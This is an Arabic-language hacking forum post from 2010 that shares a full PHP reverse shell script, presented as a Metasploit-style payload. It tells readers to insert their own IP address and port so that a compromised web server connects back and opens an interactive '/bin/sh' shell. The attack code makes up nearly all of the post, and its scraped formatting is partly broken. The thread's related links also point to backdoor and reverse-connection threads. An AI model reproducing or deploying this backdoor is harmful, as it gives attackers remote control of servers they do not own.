التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-09-2010, 02:11 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي كود php للاتصال العكسي (البايلود الخاص بالميتاسبلوت)


السلام عليكم

بالشرح تاع الاتصال العكسي الي عملته قبل فتره عملت جزء بتعلق بالميتا سبلوت

تمام

في مجال نختصر الاوامر الي عملناها بانا نستخرج الكون وعطيكم اياه جاهز وانتو الكم البقيه


وهاد الكود

كود PHP:
<?php 

    set_time_limit 
(0); 
    
$VERSION "1.0"
    
$ip 'IP';  // BURAYA KEND? ?P'niz.. 
    
$port 443;       // CHANGE THIS 
    
$chunk_size 1400
    
$write_a null
    
$error_a null
    
$shell 'uname-a; w; id; /bin/sh -i'
    
$daemon 0
    
$debug 0

    
// 
    // Daemonise ourself if possible to avoid zombies later 
    // 

    // pcntl_fork is hardly ever available, but will allow us to daemonise 
    // our php process and avoid zombies.  Worth a try... 
    
if (function_exists('pcntl_fork')) { 
       
// Fork and have the parent process exit 
       
$pid pcntl_fork(); 
        
       if (
$pid == -1) { 
          
printit("ERROR: Can't fork"); 
          exit(
1); 
       } 
        
       if (
$pid) { 
          exit(
0);  // Parent exits 
       


       
// Make the current process a session leader 
       // Will only succeed if we forked 
       
if (posix_setsid() == -1) { 
          
printit("Error: Can't setsid()"); 
          exit(
1); 
       } 

       
$daemon 1
    } else { 
       
printit("WARNING: Failed to daemonise.  This is quite common and not fatal."); 
    } 

    
// Change to a safe directory 
    
chdir("/"); 

    
// Remove any umask we inherited 
    
umask(0); 

    
// 
    // Do the reverse shell... 
    // 

    // Open reverse connection 
    
$sock fsockopen($ip$port$errno$errstr30); 
    if (!
$sock) { 
       
printit("$errstr ($errno)"); 
       exit(
1); 
    } 

    
// Spawn shell process 
    
$descriptorspec = array( 
       
=> array("pipe""r"),  // stdin is a pipe that the child will read from 
       
=> array("pipe""w"),  // stdout is a pipe that the child will write to 
       
=> array("pipe""w")   // stderr is a pipe that the child will write to 
    
); 

    
$process proc_open($shell$descriptorspec$pipes); 

    if (!
is_resource($process)) { 
       
printit("ERROR: Can't spawn shell"); 
       exit(
1); 
    } 

    
// Set everything to non-blocking 
    // Reason: Occsionally reads will block, even though stream_select tells us they won't 
    
stream_set_blocking($pipes[0], 0); 
    
stream_set_blocking($pipes[1], 0); 
    
stream_set_blocking($pipes[2], 0); 
    
stream_set_blocking($sock0); 

    
printit("Successfully opened reverse shell to $ip:$port"); 

    while (
1) { 
       
// Check for end of TCP connection 
       
if (feof($sock)) { 
          
printit("ERROR: Shell connection terminated"); 
          break; 
       } 

       
// Check for end of STDOUT 
       
if (feof($pipes[1])) { 
          
printit("ERROR: Shell process terminated"); 
          break; 
       } 

       
// Wait until a command is end down $sock, or some 
       // command output is available on STDOUT or STDERR 
       
$read_a = array($sock$pipes[1], $pipes[2]); 
       
$num_changed_sockets stream_select($read_a$write_a$error_anull); 

       
// If we can read from the TCP socket, send 
       // data to process's STDIN 
       
if (in_array($sock$read_a)) { 
          if (
$debugprintit("SOCK READ"); 
          
$input fread($sock$chunk_size); 
          if (
$debugprintit("SOCK: $input"); 
          
fwrite($pipes[0], $input); 
       } 

       
// If we can read from the process's STDOUT 
       // send data down tcp connection 
       
if (in_array($pipes[1], $read_a)) { 
          if (
$debugprintit("STDOUT READ"); 
          
$input fread($pipes[1], $chunk_size); 
          if (
$debugprintit("STDOUT: $input"); 
          
fwrite($sock$input); 
       } 

       
// If we can read from the process's STDERR 
       // send data down tcp connection 
       
if (in_array($pipes[2], $read_a)) { 
          if (
$debugprintit("STDERR READ"); 
          
$input fread($pipes[2], $chunk_size); 
          if (
$debugprintit("STDERR: $input"); 
          
fwrite($sock$input); 
       } 
    } 

    
fclose($sock); 
    
fclose($pipes[0]); 
    
fclose($pipes[1]); 
    
fclose($pipes[2]); 
    
proc_close($process); 

    
// Like print, but does nothing if we've daemonised ourself 
    // (I can't figure out how to redirect STDOUT like a proper daemon) 
    
function printit ($string) { 
       if (!
$daemon) { 
          print 
"$string\n"
       } 
    } 

    
?>

عند 'IP';
ضع اي بي جهازك
الحقيقي

عند port ضع البورت الي بدك تتصل منه

موفقين


;,] php gghjwhg hgu;sd (hgfhdg,] hgohw fhgldjhsfg,j)

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرح لثغرة بالميتاسبلوت مع عرض الاوامر الاساسية ابو بدر MetaSploit 7 05-06-2012 01:08 AM
backdoor الايراني للاتصال العكسي DR.THMoORY قـسـم أدوات واندكـسات الإختراق 27 01-20-2011 08:14 AM
شرح التسجيل في موقع ultravpn للاتصال العكسي لضمان و صول التبليغ...بالصور Antivirus7 قســم إختــراق الأجهــزة 6 08-10-2010 04:00 AM


الساعة الآن 12:01 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0